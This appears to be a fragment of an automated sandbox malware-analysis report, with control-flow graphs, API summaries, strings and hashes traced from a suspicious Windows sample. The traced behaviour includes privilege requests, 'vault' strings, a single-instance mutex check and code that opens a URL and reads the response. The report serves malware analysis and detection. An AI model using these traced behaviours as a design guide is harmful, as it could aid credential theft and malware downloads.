218bfb8c223 call 218bfbfcb90 1305->1314 1315 218bfb8c20a-218bfb8c21d 1305->1315 1318 218bfb8c254-218bfb8c268 1306->1318 1319 218bfb8c28a-218bfb8c2b0 1306->1319 1308->1299 1309->1308 1309->1317 1312->1302 1313->1312 1323 218bfb8c89d-218bfb8c8a2 call 218bfbdfc0c 1313->1323 1314->1306 1315->1314 1328 218bfb8c8a3-218bfb8c8a8 call 218bfbdfc0c 1315->1328 1317->1323 1331 218bfb8c283-218bfb8c288 call 218bfbfcb90 1318->1331 1332 218bfb8c26a-218bfb8c27d 1318->1332 1326 218bfb8c2b2-218bfb8c2c6 1319->1326 1327 218bfb8c2e8-218bfb8c2fa 1319->1327 1323->1328 1344 218bfb8c2e1-218bfb8c2e6 call 218bfbfcb90 1326->1344 1345 218bfb8c2c8-218bfb8c2db 1326->1345 1327->1231 1339 218bfb8c8a9-218bfb8c8ae call 218bfbdfc0c 1328->1339 1331->1319 1332->1331 1332->1339 1350 218bfb8c8af-218bfb8c8b4 call 218bfbdfc0c 1339->1350 1361 218bfb8c72b-218bfb8c737 1340->1361 1346 218bfb8c712 1341->1346 1347 218bfb8c83d-218bfb8c88a call 218bfb90a00 call 218bfb94670 call 218bfb94740 call 218bfbff198 1341->1347 1344->1327 1345->1344 1345->1350 1346->1361 1389 218bfb8c88b-218bfb8c890 call 218bfbdfc0c 1347->1389 1376 218bfb8c8b5-218bfb8c8ba call 218bfbdfc0c 1350->1376 1362 218bfb8c520-218bfb8c534 1355->1362 1363 218bfb8c554-218bfb8c57a 1355->1363 1358 218bfb8c4f0 call 218bfbfcb90 1356->1358 1359 218bfb8c4d7-218bfb8c4ea 1356->1359 1358->1355 1359->1358 1359->1376 1371 218bfb8c739-218bfb8c75c 1361->1371 1372 218bfb8c75e-218bfb8c768 call 218bfb99d50 1361->1372 1369 218bfb8c536-218bfb8c549 1362->1369 1370 218bfb8c54f call 218bfbfcb90 1362->1370 1374 218bfb8c5b0-218bfb8c5c9 1363->1374 1375 218bfb8c57c-218bfb8c590 1363->1375 1369->1370 1378 218bfb8c837-218bfb8c83c call 218bfbdfc0c 1369->1378 1370->1363 1380 218bfb8c76d-218bfb8c77e call 218bfb90fb0 1371->1380 1372->1380 1374->1246 1383 218bfb8c592-218bfb8c5a5 1375->1383 1384 218bfb8c5ab call 218bfbfcb90 1375->1384 1378->1347 1380->1242 1383->1384 1383->1389 1384->1374 1389->1303
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                  • String ID: cannot use push_back() with $system$vault
                                                                                                                                                                  • API String ID: 2449869053-1741236777
                                                                                                                                                                  • Opcode ID: 6ec01953fb94d6d865bcfee4734b6fd8f4fc47430b4055886f50ce092f786d41
                                                                                                                                                                  • Instruction ID: ebacd44eee53044c0b17c2ddc174d792209aacc7d95611cf25d00bc86474b893
                                                                                                                                                                  • Opcode Fuzzy Hash: 6ec01953fb94d6d865bcfee4734b6fd8f4fc47430b4055886f50ce092f786d41
                                                                                                                                                                  • Instruction Fuzzy Hash: B5926E72209BC489DB60CF29E8883DD73A4F799798F504216DB9D9BB99EF74C694C300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1478 218bfbc6480-218bfbc64a2 call 218bfbc9760 1481 218bfbc64a4-218bfbc64cd call 218bfbc9aa0 call 218bfbd4740 call 218bfb8fb00 ExitProcess 1478->1481 1482 218bfbc64ce-218bfbc6580 call 218bfbd5970 * 2 call 218bfbd1ff0 call 218bfbc6eb0 1478->1482 1481->1482 1497 218bfbc65b4-218bfbc65eb OpenMutexA 1482->1497 1498 218bfbc6582-218bfbc6594 1482->1498 1499 218bfbc65ed-218bfbc65f8 ExitProcess 1497->1499 1500 218bfbc65f9-218bfbc6630 CreateMutexA call 218bfbc09f0 call 218bfbc9be0 1497->1500 1501 218bfbc6596-218bfbc65a9 1498->1501 1502 218bfbc65af call 218bfbfcb90 1498->1502 1499->1500 1513 218bfbc6632-218bfbc663d ExitProcess 1500->1513 1514 218bfbc663e-218bfbc66a1 call 218bfbd22f0 call 218bfb8b820 call 218bfb8c8c0 call 218bfb8cf60 call 218bfb8dc90 call 218bfb8acc0 call 218bfbb0d70 call 218bfbb3a60 call 218bfb81100 call 218bfb89090 call 218bfb87940 call 218bfbc70e0 call 218bfb8a1f0 call 218bfb85a90 call 218bfb82e30 call 218bfb85d60 call 218bfbce9f0 1500->1514 1501->1502 1505 218bfbc6746-218bfbc674b call 218bfbdfc0c 1501->1505 1502->1497 1510 218bfbc674c-218bfbc6751 call 218bfbdfc0c 1505->1510 1513->1514 1551 218bfbc66a6-218bfbc66b6 call 218bfbc5a80 1514->1551 1555 218bfbc66b8-218bfbc66c4 ReleaseMutex call 218bfc22138 1551->1555 1556 218bfbc66ca-218bfbc66d1 1551->1556 1555->1556 1558 218bfbc66d3-218bfbc66d8 call 218bfbc6760 1556->1558 1559 218bfbc66d9-218bfbc66e5 1556->1559 1558->1559 1561 218bfbc6715-218bfbc6745 call 218bfbfcb70 1559->1561 1562 218bfbc66e7-218bfbc66f9 1559->1562 1564 218bfbc6710 call 218bfbfcb90 1562->1564 1565 218bfbc66fb-218bfbc670e 1562->1565 1564->1561 1565->1510 1565->1564
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$Exit$MutexOpenToken$CreateCurrentFileInformationInitializeModuleName
                                                                                                                                                                  • String ID: SeDebugPrivilege$SeImpersonatePrivilege
                                                                                                                                                                  • API String ID: 470559343-3768118664
                                                                                                                                                                  • Opcode ID: cd7fefbe807adf7c9ad34d63c6463c72688dbffd525261b722a8fc454c4cf6d4
                                                                                                                                                                  • Instruction ID: cd9afe1ee1fb5e216624990df3af03292d20d76a10c7516f29895cdfa22260ae
                                                                                                                                                                  • Opcode Fuzzy Hash: cd7fefbe807adf7c9ad34d63c6463c72688dbffd525261b722a8fc454c4cf6d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 7261A47120CA8081FA20AB65E4DD7EF6351EBE5798F505915EACDC2AD7DF28CB84CB01

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1569 218bfbf114c-218bfbf1187 call 218bfbf07e8 call 218bfbf07f0 call 218bfbf0858 1576 218bfbf13b1-218bfbf13fd call 218bfbdfc3c call 218bfbf07e8 call 218bfbf07f0 call 218bfbf0858 1569->1576 1577 218bfbf118d-218bfbf1198 call 218bfbf07f8 1569->1577 1604 218bfbf1403-218bfbf140e call 218bfbf07f8 1576->1604 1605 218bfbf153b-218bfbf15a9 call 218bfbdfc3c call 218bfbf9d94 1576->1605 1577->1576 1582 218bfbf119e-218bfbf11a8 1577->1582 1585 218bfbf11ca-218bfbf11ce 1582->1585 1586 218bfbf11aa-218bfbf11ad 1582->1586 1587 218bfbf11d1-218bfbf11d9 1585->1587 1589 218bfbf11b0-218bfbf11bb 1586->1589 1587->1587 1590 218bfbf11db-218bfbf11ee call 218bfbededc 1587->1590 1592 218bfbf11c6-218bfbf11c8 1589->1592 1593 218bfbf11bd-218bfbf11c4 1589->1593 1599 218bfbf1206-218bfbf1212 call 218bfbeb550 1590->1599 1600 218bfbf11f0-218bfbf11f2 call 218bfbeb550 1590->1600 1592->1585 1596 218bfbf11f7-218bfbf1205 1592->1596 1593->1589 1593->1592 1609 218bfbf1219-218bfbf1221 1599->1609 1600->1596 1604->1605 1614 218bfbf1414-218bfbf141f call 218bfbf0828 1604->1614 1622 218bfbf15b7-218bfbf15ba 1605->1622 1623 218bfbf15ab-218bfbf15b2 1605->1623 1609->1609 1613 218bfbf1223-218bfbf1234 call 218bfbf62e8 1609->1613 1613->1576 1624 218bfbf123a-218bfbf1290 call 218bfc0f960 * 4 call 218bfbf1068 1613->1624 1614->1605 1621 218bfbf1425-218bfbf1448 call 218bfbeb550 GetTimeZoneInformation 1614->1621 1637 218bfbf1510-218bfbf153a call 218bfbf07e0 call 218bfbf07d0 call 218bfbf07d8 1621->1637 1638 218bfbf144e-218bfbf146f 1621->1638 1625 218bfbf15f1-218bfbf1604 call 218bfbededc 1622->1625 1626 218bfbf15bc 1622->1626 1628 218bfbf1647-218bfbf164a 1623->1628 1681 218bfbf1292-218bfbf1296 1624->1681 1647 218bfbf1606 1625->1647 1648 218bfbf160f-218bfbf162a call 218bfbf9d94 1625->1648 1631 218bfbf15bf call 218bfbf13c8 1626->1631 1628->1631 1633 218bfbf1650-218bfbf1658 call 218bfbf114c 1628->1633 1642 218bfbf15c4-218bfbf15f0 call 218bfbeb550 call 218bfbfcb70 1631->1642 1633->1642 1643 218bfbf1471-218bfbf1477 1638->1643 1644 218bfbf147a-218bfbf1481 1638->1644 1643->1644 1652 218bfbf1495 1644->1652 1653 218bfbf1483-218bfbf148b 1644->1653 1655 218bfbf1608-218bfbf160d call 218bfbeb550 1647->1655 1663 218bfbf1631-218bfbf1643 call 218bfbeb550 1648->1663 1664 218bfbf162c-218bfbf162f 1648->1664 1659 218bfbf1497-218bfbf150b call 218bfc0f960 * 4 call 218bfbf4cb4 call 218bfbf1660 * 2 1652->1659 1653->1652 1660 218bfbf148d-218bfbf1493 1653->1660 1655->1626 1659->1637 1660->1659 1663->1628 1664->1655 1683 218bfbf129c-218bfbf12a0 1681->1683 1684 218bfbf1298 1681->1684 1683->1681 1686 218bfbf12a2-218bfbf12c7 call 218bfbe3f10 1683->1686 1684->1683 1693 218bfbf12ca-218bfbf12ce 1686->1693 1694 218bfbf12d0-218bfbf12db 1693->1694 1695 218bfbf12dd-218bfbf12e1 1693->1695 1694->1695 1697 218bfbf12e3-218bfbf12e7 1694->1697 1695->1693 1699 218bfbf12e9-218bfbf1311 call 218bfbe3f10 1697->1699 1700 218bfbf1368-218bfbf136c 1697->1700 1709 218bfbf1313 1699->1709 1710 218bfbf132f-218bfbf1333 1699->1710 1702 218bfbf1373-218bfbf1380 1700->1702 1703 218bfbf136e-218bfbf1370 1700->1703 1705 218bfbf1382-218bfbf1398 call 218bfbf1068 1702->1705 1706 218bfbf139b-218bfbf13aa call 218bfbf07e0 call 218bfbf07d0 1702->1706 1703->1702 1705->1706 1706->1576 1713 218bfbf1316-218bfbf131d 1709->1713 1710->1700 1715 218bfbf1335-218bfbf1353 call 218bfbe3f10 1710->1715 1713->1710 1716 218bfbf131f-218bfbf132d 1713->1716 1721 218bfbf135f-218bfbf1366 1715->1721 1716->1710 1716->1713 1721->1700 1722 218bfbf1355-218bfbf1359 1721->1722 1722->1700 1723 218bfbf135b 1722->1723 1723->1721
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                  • API String ID: 355007559-239921721
                                                                                                                                                                  • Opcode ID: 81739166be4aa7f83f73f8b5c4c772bb7cbf832f5b2b22088efdd0610fe74ccd
                                                                                                                                                                  • Instruction ID: e1791e8bbdd10847627da596fad09a13c2d46ebf429c6e9df8cb4a2e34107a35
                                                                                                                                                                  • Opcode Fuzzy Hash: 81739166be4aa7f83f73f8b5c4c772bb7cbf832f5b2b22088efdd0610fe74ccd
                                                                                                                                                                  • Instruction Fuzzy Hash: C2D1D73660825086EB20EF36D8D87ED67A1F764B8CF448525DE89C7A96DF38CE91C740

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1724 218bfbcf200-218bfbcf39e 1725 218bfbcf3a0-218bfbcf3a7 1724->1725 1725->1725 1726 218bfbcf3a9-218bfbcf3dc call 218bfb95330 InternetOpenA 1725->1726 1729 218bfbcf475-218bfbcf48c 1726->1729 1730 218bfbcf3e2-218bfbcf3f8 1726->1730 1732 218bfbcf491-218bfbcf4b8 InternetOpenUrlA 1729->1732 1733 218bfbcf48e 1729->1733 1731 218bfbcf400-218bfbcf408 1730->1731 1734 218bfbcf43b-218bfbcf474 call 218bfbfcb70 1731->1734 1735 218bfbcf40a-218bfbcf41b 1731->1735 1736 218bfbcf4e9-218bfbcf514 HttpQueryInfoW 1732->1736 1737 218bfbcf4ba-218bfbcf4e4 1732->1737 1733->1732 1738 218bfbcf436 call 218bfbfcb90 1735->1738 1739 218bfbcf41d-218bfbcf430 1735->1739 1741 218bfbcf516-218bfbcf54a 1736->1741 1742 218bfbcf54f-218bfbcf5aa HttpQueryInfoW 1736->1742 1737->1731 1738->1734 1739->1738 1743 218bfbcf875-218bfbcf87a call 218bfbdfc0c 1739->1743 1741->1742 1745 218bfbcf5ac-218bfbcf5c2 call 218bfbe3f10 1742->1745 1746 218bfbcf5d8-218bfbcf5ee InternetQueryDataAvailable 1742->1746 1760 218bfbcf87b-218bfbcf880 call 218bfb7b7b0 1743->1760 1745->1746 1759 218bfbcf5c4-218bfbcf5d3 call 218bfb951e0 1745->1759 1752 218bfbcf5f4-218bfbcf5f9 1746->1752 1753 218bfbcf7d3-218bfbcf826 InternetCloseHandle 1746->1753 1756 218bfbcf600-218bfbcf606 1752->1756 1758 218bfbcf82f-218bfbcf838 1753->1758 1756->1753 1761 218bfbcf60c-218bfbcf626 1756->1761 1758->1734 1765 218bfbcf83e-218bfbcf84f 1758->1765 1759->1746 1763 218bfbcf699-218bfbcf6b1 InternetReadFile 1761->1763 1764 218bfbcf628-218bfbcf62e 1761->1764 1772 218bfbcf6b7-218bfbcf6bc 1763->1772 1773 218bfbcf78d-218bfbcf794 1763->1773 1768 218bfbcf630-218bfbcf637 1764->1768 1769 218bfbcf65c-218bfbcf65f call 218bfbfcb98 1764->1769 1765->1738 1770 218bfbcf855-218bfbcf868 1765->1770 1768->1760 1774 218bfbcf63d-218bfbcf648 call 218bfbfcb98 1768->1774 1780 218bfbcf664-218bfbcf694 call 218bfc0f960 1769->1780 1770->1743 1776 218bfbcf86a 1770->1776 1772->1773 1777 218bfbcf6c2-218bfbcf6cd 1772->1777 1773->1753 1778 218bfbcf796-218bfbcf7a7 1773->1778 1785 218bfbcf86f-218bfbcf874 call 218bfbdfc0c 1774->1785 1794 218bfbcf64e-218bfbcf65a 1774->1794 1776->1738 1781 218bfbcf6ff-218bfbcf719 call 218bfb95cb0 1777->1781 1782 218bfbcf6cf-218bfbcf6fd call 218bfc0f2c0 1777->1782 1783 218bfbcf7c2-218bfbcf7cf call 218bfbfcb90 1778->1783 1784 218bfbcf7a9-218bfbcf7bc 1778->1784 1780->1763 1797 218bfbcf71a-218bfbcf721 1781->1797 1782->1797 1783->1753 1784->1783 1784->1785 1785->1743 1794->1780 1799 218bfbcf764 1797->1799 1800 218bfbcf723-218bfbcf734 1797->1800 1803 218bfbcf766-218bfbcf77c InternetQueryDataAvailable 1799->1803 1801 218bfbcf736-218bfbcf749 1800->1801 1802 218bfbcf74f-218bfbcf762 call 218bfbfcb90 1800->1802 1801->1785 1801->1802 1802->1803 1803->1753 1805 218bfbcf77e-218bfbcf788 1803->1805 1805->1756
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$Query$AvailableDataHttpInfoOpen$CloseConcurrency::cancel_current_taskFileHandleRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1475545111-0
                                                                                                                                                                  • Opcode ID: e8855195ea265ae84a133c33385b975d46d9f3ef8b7d910a33788403175075df
                                                                                                                                                                  • Instruction ID: 07fdc8e3321d1f21c4d279a183277aa52b8dcc4f43a9bdfe96a5a31f6480fb78
                                                                                                                                                                  • Opcode Fuzzy Hash: e8855195ea265ae84a133c33385b975d46d9f3ef8b7d910a33788403175075df
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F02A132A18B9485EB10CF69E88439E77B4F795798F204615EE9C97FA8DF38C584C700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1807 218bfc0e968-218bfc0e9db call 218bfc0e54c 1810 218bfc0e9dd-218bfc0e9e6 call 218bfbe40ac 1807->1810 1811 218bfc0e9f5-218bfc0e9ff call 218bfbf397c 1807->1811 1816 218bfc0e9e9-218bfc0e9f0 call 218bfbe40cc 1810->1816 1817 218bfc0ea1a-218bfc0ea83 CreateFileW 1811->1817 1818 218bfc0ea01-218bfc0ea18 call 218bfbe40ac call 218bfbe40cc 1811->1818 1834 218bfc0ed36-218bfc0ed56 1816->1834 1820 218bfc0eb00-218bfc0eb0b GetFileType 1817->1820 1821 218bfc0ea85-218bfc0ea8b 1817->1821 1818->1816 1827 218bfc0eb0d-218bfc0eb48 call 218bfc22160 call 218bfbe4040 call 218bfc22138 1820->1827 1828 218bfc0eb5e-218bfc0eb65 1820->1828 1824 218bfc0eacd-218bfc0eafb call 218bfc22160 call 218bfbe4040 1821->1824 1825 218bfc0ea8d-218bfc0ea91 1821->1825 1824->1816 1825->1824 1830 218bfc0ea93-218bfc0eacb CreateFileW 1825->1830 1827->1816 1854 218bfc0eb4e-218bfc0eb59 call 218bfbe40cc 1827->1854 1832 218bfc0eb6d-218bfc0eb70 1828->1832 1833 218bfc0eb67-218bfc0eb6b 1828->1833 1830->1820 1830->1824 1839 218bfc0eb76-218bfc0ebcb call 218bfbf3894 1832->1839 1840 218bfc0eb72 1832->1840 1833->1839 1848 218bfc0ebea-218bfc0ec1b call 218bfc0e2cc 1839->1848 1849 218bfc0ebcd-218bfc0ebd9 call 218bfc0e754 1839->1849 1840->1839 1858 218bfc0ec1d-218bfc0ec1f 1848->1858 1859 218bfc0ec21-218bfc0ec63 1848->1859 1849->1848 1856 218bfc0ebdb 1849->1856 1854->1816 1860 218bfc0ebdd-218bfc0ebe5 call 218bfbeb6c8 1856->1860 1858->1860 1862 218bfc0ec85-218bfc0ec90 1859->1862 1863 218bfc0ec65-218bfc0ec69 1859->1863 1860->1834 1866 218bfc0ed34 1862->1866 1867 218bfc0ec96-218bfc0ec9a 1862->1867 1863->1862 1865 218bfc0ec6b-218bfc0ec80 1863->1865 1865->1862 1866->1834 1867->1866 1869 218bfc0eca0-218bfc0ece5 call 218bfc22138 CreateFileW 1867->1869 1872 218bfc0ed1a-218bfc0ed2f 1869->1872 1873 218bfc0ece7-218bfc0ed15 call 218bfc22160 call 218bfbe4040 call 218bfbf3abc 1869->1873 1872->1866 1873->1872
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                  • Opcode ID: 484b9744f6cc28d441a3ba22cd2a9bb849a09fc1e06d845b9773f87c4c6ec638
                                                                                                                                                                  • Instruction ID: 1372b3342086d55fb2e0cc6e56c2e7c4f97c2afd9df85b98221bb335e2609624
                                                                                                                                                                  • Opcode Fuzzy Hash: 484b9744f6cc28d441a3ba22cd2a9bb849a09fc1e06d845b9773f87c4c6ec638
                                                                                                                                                                  • Instruction Fuzzy Hash: B4C1CE36728A5085EB10CFB9C4A87EC3761F799BACF051215DB2A977A5CF38C692C300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1905 218bfbc8f60-218bfbc8fe5 call 218bfb7e9a0 1908 218bfbc8fe7-218bfbc8fe9 1905->1908 1909 218bfbc8ff1-218bfbc8ff4 1905->1909 1910 218bfbc9700-218bfbc9716 call 218bfb7e0f0 1908->1910 1911 218bfbc8fef 1908->1911 1912 218bfbc8ff6-218bfbc9002 1909->1912 1913 218bfbc9007-218bfbc9020 call 218bfc0f960 1909->1913 1923 218bfbc9717-218bfbc971c call 218bfbdfc0c 1910->1923 1911->1912 1914 218bfbc967f-218bfbc96ab call 218bfbfcb70 1912->1914 1921 218bfbc9025-218bfbc908b call 218bfbd91d0 1913->1921 1922 218bfbc9022 1913->1922 1929 218bfbc9485-218bfbc94bf call 218bfba4da0 call 218bfba4cc0 1921->1929 1930 218bfbc9091-218bfbc9099 1921->1930 1922->1921 1928 218bfbc971d-218bfbc9751 call 218bfb7ba80 call 218bfb7cc70 call 218bfbff198 1923->1928 1946 218bfbc94c1-218bfbc94d2 call 218bfb951e0 1929->1946 1947 218bfbc94de-218bfbc956c call 218bfba4da0 call 218bfbd76a0 1929->1947 1933 218bfbc909e call 218bfbd3b30 1930->1933 1934 218bfbc909b 1930->1934 1938 218bfbc90a3-218bfbc90c1 call 218bfbd3cf0 1933->1938 1934->1933 1949 218bfbc90c7-218bfbc90dd 1938->1949 1950 218bfbc919c-218bfbc91b6 GetFileSize 1938->1950 1953 218bfbc94d7 1946->1953 1947->1928 1974 218bfbc9572-218bfbc9576 call 218bfba2080 1947->1974 1955 218bfbc9113-218bfbc9197 call 218bfba19c0 1949->1955 1956 218bfbc90df-218bfbc90f3 1949->1956 1957 218bfbc91dd-218bfbc91f3 1950->1957 1958 218bfbc91b8-218bfbc91db 1950->1958 1953->1947 1975 218bfbc966b-218bfbc967a call 218bfc0ac3c 1955->1975 1960 218bfbc90f5-218bfbc9108 1956->1960 1961 218bfbc910e call 218bfbfcb90 1956->1961 1964 218bfbc9225-218bfbc923d call 218bfb95b00 1957->1964 1965 218bfbc91f5-218bfbc9223 call 218bfc0f960 1957->1965 1963 218bfbc9242-218bfbc928b SetFilePointer ReadFile 1958->1963 1960->1923 1960->1961 1961->1955 1969 218bfbc9291-218bfbc92e3 1963->1969 1970 218bfbc93a2-218bfbc93c6 1963->1970 1964->1963 1965->1963 1983 218bfbc92e5-218bfbc92f9 1969->1983 1984 218bfbc9319-218bfbc939d call 218bfba19c0 1969->1984 1980 218bfbc93fc-218bfbc9480 call 218bfba19c0 1970->1980 1981 218bfbc93c8-218bfbc93dc 1970->1981 1982 218bfbc957b-218bfbc957e 1974->1982 1975->1914 1980->1975 1985 218bfbc93f7 call 218bfbfcb90 1981->1985 1986 218bfbc93de-218bfbc93f1 1981->1986 1988 218bfbc9580-218bfbc95a7 1982->1988 1989 218bfbc95ad-218bfbc9667 call 218bfba19c0 1982->1989 1990 218bfbc9314 call 218bfbfcb90 1983->1990 1991 218bfbc92fb-218bfbc930e 1983->1991 1984->1975 1985->1980 1986->1923 1986->1985 1988->1989 1995 218bfbc96ac-218bfbc96af 1988->1995 1989->1975 1990->1984 1991->1923 1991->1990 1999 218bfbc96b1-218bfbc96b8 1995->1999 2000 218bfbc96ba-218bfbc96cb 1995->2000 2002 218bfbc96cf-218bfbc96ff call 218bfb7ba80 call 218bfb7cc70 call 218bfbff198 1999->2002 2000->2002 2002->1910
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$PointerReadSize
                                                                                                                                                                  • String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 404940565-15404121
                                                                                                                                                                  • Opcode ID: affdc8d990f8177c4bd12a26e0f17cee26683ca6759411cf7414f1df89e439f9
                                                                                                                                                                  • Instruction ID: dd8a3dfc8033c450f60ead9740db3defa6e0a750aaf7b9a6c495573c53fb00b5
                                                                                                                                                                  • Opcode Fuzzy Hash: affdc8d990f8177c4bd12a26e0f17cee26683ca6759411cf7414f1df89e439f9
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F321632618BC489EB20CF34D8947DD37A1F795B4CF508626DA8D97A99EF74CA89C700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2127 218bfbf13c8-218bfbf13fd call 218bfbf07e8 call 218bfbf07f0 call 218bfbf0858 2134 218bfbf1403-218bfbf140e call 218bfbf07f8 2127->2134 2135 218bfbf153b-218bfbf15a9 call 218bfbdfc3c call 218bfbf9d94 2127->2135 2134->2135 2141 218bfbf1414-218bfbf141f call 218bfbf0828 2134->2141 2147 218bfbf15b7-218bfbf15ba 2135->2147 2148 218bfbf15ab-218bfbf15b2 2135->2148 2141->2135 2146 218bfbf1425-218bfbf1448 call 218bfbeb550 GetTimeZoneInformation 2141->2146 2158 218bfbf1510-218bfbf153a call 218bfbf07e0 call 218bfbf07d0 call 218bfbf07d8 2146->2158 2159 218bfbf144e-218bfbf146f 2146->2159 2149 218bfbf15f1-218bfbf1604 call 218bfbededc 2147->2149 2150 218bfbf15bc 2147->2150 2152 218bfbf1647-218bfbf164a 2148->2152 2167 218bfbf1606 2149->2167 2168 218bfbf160f-218bfbf162a call 218bfbf9d94 2149->2168 2153 218bfbf15bf call 218bfbf13c8 2150->2153 2152->2153 2155 218bfbf1650-218bfbf1658 call 218bfbf114c 2152->2155 2162 218bfbf15c4-218bfbf15f0 call 218bfbeb550 call 218bfbfcb70 2153->2162 2155->2162 2163 218bfbf1471-218bfbf1477 2159->2163 2164 218bfbf147a-218bfbf1481 2159->2164 2163->2164 2171 218bfbf1495 2164->2171 2172 218bfbf1483-218bfbf148b 2164->2172 2174 218bfbf1608-218bfbf160d call 218bfbeb550 2167->2174 2181 218bfbf1631-218bfbf1643 call 218bfbeb550 2168->2181 2182 218bfbf162c-218bfbf162f 2168->2182 2177 218bfbf1497-218bfbf150b call 218bfc0f960 * 4 call 218bfbf4cb4 call 218bfbf1660 * 2 2171->2177 2172->2171 2178 218bfbf148d-218bfbf1493 2172->2178 2174->2150 2177->2158 2178->2177 2181->2152 2182->2174
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                  • API String ID: 3458911817-239921721
                                                                                                                                                                  • Opcode ID: 8c7917a29c397fa3200ed5a7405142a85cef7c6524de68c4b18d81a385570565
                                                                                                                                                                  • Instruction ID: 16ec0f56e2dd314ea022f11abed3061364d501c37b848e7350546edda49a1353
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7917a29c397fa3200ed5a7405142a85cef7c6524de68c4b18d81a385570565
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F51B23221865086E710DF35E8D87DD7760F7A8B8CF445526EA89C7BA6DF38CA91CB40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
